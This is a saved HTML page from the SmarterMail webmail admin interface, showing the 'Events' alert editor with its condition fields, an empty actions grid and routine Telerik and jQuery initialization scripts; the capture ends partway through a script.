<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQSEppX2FX7xGjssjmzh3aozGMCNxIa5fXHK-5EksyX-g2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQOy5RBkrirLHJx_V0Tl-SEpzLhS3ytBc6dHK_b8SuhHQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWRRnleWjMZxbEwU_E-8AjN5PYJXDckj9QOT-WQBoClmsHYyyS9JSXD6F_jvWWBGqo01&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1PWslctYv3SyMb4XUFYFVUAUmpHu3v1jth73Pi-k7Mak1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFnLh1zs6-mYZ3jYkwjGi5OOeB5q262XchWnUM37uuuc4u4Eh6ZtFqwIWQgZDUBELcg2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFnLh1zs6-mYZ3jYkwjGi5OPZvXc391HAbgs03L_o9VOK82B8IiiN14y-pdC8rPOEvdX6kxin3NUH_a3R6GADuX01&amp;t=1a035eeb" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1','tctl00$MPH$UpdatePanel2'], ['ctl00$BPH$btnDelete','ctl00$BPH$btnAdd'], [], 90);
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Events
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_GridButtons" style="display: none" class="TogglableButtons">
       <div id="ctl00_BPH_btnAdd" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnAdd',''); return false;"><span class="BBInner">Add Action</span></a></div>
       <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEdit(); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
   </div>

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" href="frmAlerts%2easpx%3flevel%3duser" onclick="window.location.href = 'frmAlerts\x2easpx\x3flevel\x3duser'; return false;" tabindex='0'><span class="BBInner">Cancel</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Actions</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
   
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
       <div id='ctl00_MPH_OptionsTab' class='' >
       <span id="ctl00_MPH_OptionsTab">
           <div id="ctl00_MPH_UpdatePanel1">
           
                   <table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_txtHookName">
                   <td id="ctl00_MPH_txtHookName_Label" class="Indent Fixed">Event Name</td><td id="ctl00_MPH_txtHookName_Setting" class="Setting"><input name="ctl00$MPH$txtHookName_SettingText" type="text" id="ctl00_MPH_txtHookName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ddEventGroup">
                   <td id="ctl00_MPH_ddEventGroup_Label" class="Indent Fixed">Event Group</td><td id="ctl00_MPH_ddEventGroup_Setting" class="Setting"><select name="ctl00$MPH$ddEventGroup_SettingDropDown" id="ctl00_MPH_ddEventGroup_SettingDropDown">
                       <option value="@DefaultEventGroup">Default Event Group</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_ddEventCategory">
                   <td id="ctl00_MPH_ddEventCategory_Label" class="Indent Fixed">Event Category</td><td id="ctl00_MPH_ddEventCategory_Setting" class="Setting"><select name="ctl00$MPH$ddEventCategory_SettingDropDown" onchange="javascript:setTimeout('__doPostBack(\'ctl00$MPH$ddEventCategory_SettingDropDown\',\'\')', 0)" id="ctl00_MPH_ddEventCategory_SettingDropDown">
                       <option selected="selected" value="@Collaboration">Collaboration</option>
                       <option value="@Email">Email</option>
                       <option value="@User">User</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_ddEventType">
                   <td id="ctl00_MPH_ddEventType_Label" class="Indent Fixed">Event Type</td><td id="ctl00_MPH_ddEventType_Setting" class="Setting"><select name="ctl00$MPH$ddEventType_SettingDropDown" onchange="javascript:setTimeout('__doPostBack(\'ctl00$MPH$ddEventType_SettingDropDown\',\'\')', 0)" id="ctl00_MPH_ddEventType_SettingDropDown">
                       <option selected="selected" value="CalendarReminder">Calendar Reminder Occured</option>
                       <option value="TaskReminder">Task Reminder Occured</option>

                   </select></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_OptionsTable" class="SettingsContainer SCMarginTop" border="0">
               <tr>
                   <td class="Indent Fixed">Domain</td><td class="Setting">hoytllc.com</td>
               </tr><tr>
                   <td class="Indent Fixed">Email Address</td><td class="Setting">testit@hoytllc.com</td>
               </tr>
           </table>
                   <table id="ctl00_MPH_ConditionsTable" class="SettingsContainer" border="0">
               <tr>
                   <td class="Indent Fixed"><input id="ctl00_MPH_enabled_timeofday" type="checkbox" name="ctl00$MPH$enabled_timeofday" /><label for="ctl00_MPH_enabled_timeofday">Time of Day</label></td><td class="Setting">
                               <table class="table">
                                   <tr>
                                       <td style="padding: 0px 2px 0px 0px">
                                           <select name="ctl00$MPH$conditiontype_timeofday" id="ctl00_MPH_conditiontype_timeofday">
                       <option value="Between">Between</option>
                       <option value="Outside">Outside</option>

                   </select>
                                       </td>
                                       <td style="padding: 0px 2px 0px 2px">
                                           <div id="ctl00_MPH_condition_timeofday_wrapper" class="RadPicker RadPicker_SmarterTools TimePickerOverride" style="display:inline-block;width:110px;">
                       <!-- 2010.2.817.35 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_condition_timeofday" name="ctl00$MPH$condition_timeofday" type="text" class="rdfd_" value="2010-10-02-09-00-00" /><table cellspacing="0" class="rcTable" style="width:110px;">
                           <tr>
                               <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_condition_timeofday_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="9:00 AM" id="ctl00_MPH_condition_timeofday_dateInput_text" name="ctl00_MPH_condition_timeofday_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_condition_timeofday_dateInput" name="ctl00$MPH$condition_timeofday$dateInput" type="text" class="rdfd_" value="2010-10-02-09-00-00" /><input id="ctl00_MPH_condition_timeofday_dateInput_ClientState" name="ctl00_MPH_condition_timeofday_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_condition_timeofday_timePopupLink" onclick="return CalendarPopup($find('ctl00_MPH_condition_timeofday'),'time');"><img id="ctl00_MPH_condition_timeofday_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_condition_timeofday_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_condition_timeofday_timeView">
                                   <table id="ctl00_MPH_condition_timeofday_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools" cellspacing="0" border="0" style="width:250px;">
                                       <tr>
                                           <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                                       </tr><tr>
                                           <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                                       </tr>
                                   </table><input id="ctl00_MPH_condition_timeofday_timeView_ClientState" name="ctl00_MPH_condition_timeofday_timeView_ClientState" type="hidden" />
                               </div></div></td>
                           </tr>
                       </table><input id="ctl00_MPH_condition_timeofday_ClientState" name="ctl00_MPH_condition_timeofday_ClientState" type="hidden" />
                   </div>
                                       </td>
                                       <td style="padding: 0px 2px 0px 2px">
                                           and
                                       </td>
                                       <td style="padding: 0px 0px 0px 2px">
                                           <div id="ctl00_MPH_condition2_timeofday_wrapper" class="RadPicker RadPicker_SmarterTools TimePickerOverride" style="display:inline-block;width:110px;">
                       <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_condition2_timeofday" name="ctl00$MPH$condition2_timeofday" type="text" class="rdfd_" value="2010-10-02-17-00-00" /><table cellspacing="0" class="rcTable" style="width:110px;">
                           <tr>
                               <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_condition2_timeofday_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="5:00 PM" id="ctl00_MPH_condition2_timeofday_dateInput_text" name="ctl00_MPH_condition2_timeofday_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_condition2_timeofday_dateInput" name="ctl00$MPH$condition2_timeofday$dateInput" type="text" class="rdfd_" value="2010-10-02-17-00-00" /><input id="ctl00_MPH_condition2_timeofday_dateInput_ClientState" name="ctl00_MPH_condition2_timeofday_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_condition2_timeofday_timePopupLink" onclick="return CalendarPopup($find('ctl00_MPH_condition2_timeofday'),'time');"><img id="ctl00_MPH_condition2_timeofday_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_condition2_timeofday_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_condition2_timeofday_timeView">
                                   <table id="ctl00_MPH_condition2_timeofday_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools" cellspacing="0" border="0" style="width:250px;">
                                       <tr>
                                           <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                                       </tr><tr>
                                           <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                                       </tr><tr>
                                           <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                                       </tr><tr>
                                           <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                                       </tr>
                                   </table><input id="ctl00_MPH_condition2_timeofday_timeView_ClientState" name="ctl00_MPH_condition2_timeofday_timeView_ClientState" type="hidden" />
                               </div></div></td>
                           </tr>
                       </table><input id="ctl00_MPH_condition2_timeofday_ClientState" name="ctl00_MPH_condition2_timeofday_ClientState" type="hidden" />
                   </div>
                                       </td>
                                   </tr>
                               </table>
                           </td>
               </tr><tr>
                   <td class="Indent Fixed"><input id="ctl00_MPH_enabled_subject" type="checkbox" name="ctl00$MPH$enabled_subject" /><label for="ctl00_MPH_enabled_subject">Subject</label></td><td class="Setting"><select name="ctl00$MPH$conditiontype_subject" id="ctl00_MPH_conditiontype_subject" onchange="CheckCondition('ctl00_MPH_conditiontype_subject', 'condition2Parent_subject');">
                       <option value="Equals">Equals</option>
                       <option value="DoesNotEqual">Doesn't Equal</option>
                       <option value="Contains">Contains</option>
                       <option value="StartsWith">Starts With</option>
                       <option value="EndsWith">Ends With</option>

                   </select>&nbsp;<input name="ctl00$MPH$condition_subject" type="text" id="ctl00_MPH_condition_subject" /><span style="display: none;" id="condition2Parent_subject"> and <input name="ctl00$MPH$condition2_subject" type="text" id="ctl00_MPH_condition2_subject" /></span></td>
               </tr><tr>
                   <td class="Indent Fixed"><input id="ctl00_MPH_enabled_location" type="checkbox" name="ctl00$MPH$enabled_location" /><label for="ctl00_MPH_enabled_location">Location</label></td><td class="Setting"><select name="ctl00$MPH$conditiontype_location" id="ctl00_MPH_conditiontype_location" onchange="CheckCondition('ctl00_MPH_conditiontype_location', 'condition2Parent_location');">
                       <option value="Equals">Equals</option>
                       <option value="DoesNotEqual">Doesn't Equal</option>
                       <option value="Contains">Contains</option>
                       <option value="StartsWith">Starts With</option>
                       <option value="EndsWith">Ends With</option>

                   </select>&nbsp;<input name="ctl00$MPH$condition_location" type="text" id="ctl00_MPH_condition_location" /><span style="display: none;" id="condition2Parent_location"> and <input name="ctl00$MPH$condition2_location" type="text" id="ctl00_MPH_condition2_location" /></span></td>
               </tr><tr>
                   <td class="Indent Fixed"><input id="ctl00_MPH_enabled_description" type="checkbox" name="ctl00$MPH$enabled_description" /><label for="ctl00_MPH_enabled_description">Description</label></td><td class="Setting"><select name="ctl00$MPH$conditiontype_description" id="ctl00_MPH_conditiontype_description" onchange="CheckCondition('ctl00_MPH_conditiontype_description', 'condition2Parent_description');">
                       <option value="Equals">Equals</option>
                       <option value="DoesNotEqual">Doesn't Equal</option>
                       <option value="Contains">Contains</option>
                       <option value="StartsWith">Starts With</option>
                       <option value="EndsWith">Ends With</option>

                   </select>&nbsp;<input name="ctl00$MPH$condition_description" type="text" id="ctl00_MPH_condition_description" /><span style="display: none;" id="condition2Parent_description"> and <input name="ctl00$MPH$condition2_description" type="text" id="ctl00_MPH_condition2_description" /></span></td>
               </tr>
           </table>
               
       </div>
       </span></div>
   
       <div id='ctl00_MPH_ActionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_ActionsTab">
           <span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
       <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl02' name='ctl00$MPH$ctl02' style='z-index:800'>
           <li class='hmItem hmFirst' id='ctl00_MPH_ctl02_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
           <li class='hmItem hmLast' id='ctl00_MPH_ctl02_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
       </ul>
       <div class='hmScrollDown'></div></div>
       </div>
       </span>
           <div id="ctl00_MPH_UpdatePanel2">
           
                   
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenInput" id="ctl00_MPH_HyperGrid1_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenLSR" id="ctl00_MPH_HyperGrid1_HiddenLSR" value="" />
</div>
</div>

                   <a id="ctl00_MPH_lnkRefresh" href="javascript:__doPostBack('ctl00$MPH$lnkRefresh','')"></a>
               
       </div>
       </span></div>
   
   </div>


       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/alerts/frmalert', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type='text/javascript'>
       function DoubleClick(newUrl, uid, isNew) {
           SpawnHyperWindow(newUrl, 650, 460, UpdateGrid);
       }    
       function UpdateGrid() {
           //
__doPostBack('ctl00$MPH$lnkRefresh','');
       }
       function TabChanged(tabSelected) {
           (tabSelected.attr('id') != "ctl00_TPH_TabStrip_Tab2") ? $("#ctl00_BPH_GridButtons").hide() : $("#ctl00_BPH_GridButtons").show();
       };
       function CheckCondition(ddl, span) {
           var ddlDom = document.getElementById(ddl);
           var spanDom = document.getElementById(span);
           if (ddlDom && spanDom) {
               if (ddlDom.value.toLowerCase() == "between")
                   spanDom.style.display = "";
               else
                   spanDom.style.display = "none";
           }
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2fAlerts\x2ffrmAlert\x2easpx?level\x3duser'); });

function DelayedSetupctl00_MPH_HyperGrid1() { }
if (self.ctl00_MPH_HyperGrid1HGIsCallback)
   DelayedSetupctl00_MPH_HyperGrid1();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_HyperGrid1, 100);});
self.ctl00_MPH_HyperGrid1HGIsCallback = true;
Sys.Application.initialize();
$(function() { SetTopTitle('Events\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
function DoEdit_ctl00_BPH_btnEdit() {
   if(self.ctl00_MPH_HyperGrid1 == null || !self.ctl00_MPH_HyperGrid1.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_HyperGrid1.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_HyperGrid1.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_HyperGrid1; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_HyperGrid1.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You can not edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_btnDelete() {
   if (!self.ctl00_MPH_HyperGrid1) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_HyperGrid1.GetSelectedRowCount ? ctl00_MPH_HyperGrid1.GetSelectedRowCount() : ctl00_MPH_HyperGrid1.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDelete);
}
function DoDelete_ctl00_BPH_btnDelete() { __doPostBack('ctl00$BPH$btnDelete',''); }
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_Tab1":"ctl00_MPH_OptionsTab","ctl00_TPH_TabStrip_Tab2":"ctl00_MPH_ActionsTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Event Name","vcID":"ctl00_MPH_txtHookName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"9:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$condition_timeofday\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_condition_timeofday_dateInput_ClientState","dateFormat":"h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Year":2,"Month":0,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":true},"displayDateFormat":"h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_condition_timeofday_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_condition_timeofday","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_condition_timeofday_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_condition_timeofday_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "", ResolvedHoverImageUrl : ""},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_condition_timeofday_popupButton","_timePopupControlID":"ctl00_MPH_condition_timeofday_timePopupLink","clientStateFieldID":"ctl00_MPH_condition_timeofday_ClientState","focusedDate":"2010-10-02-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"dateInput":"ctl00_MPH_condition_timeofday_dateInput","timeView":"ctl00_MPH_condition_timeofday_timeView"}, $get("ctl00_MPH_condition_timeofday"));
});
Sys.Application.add_init(function() {
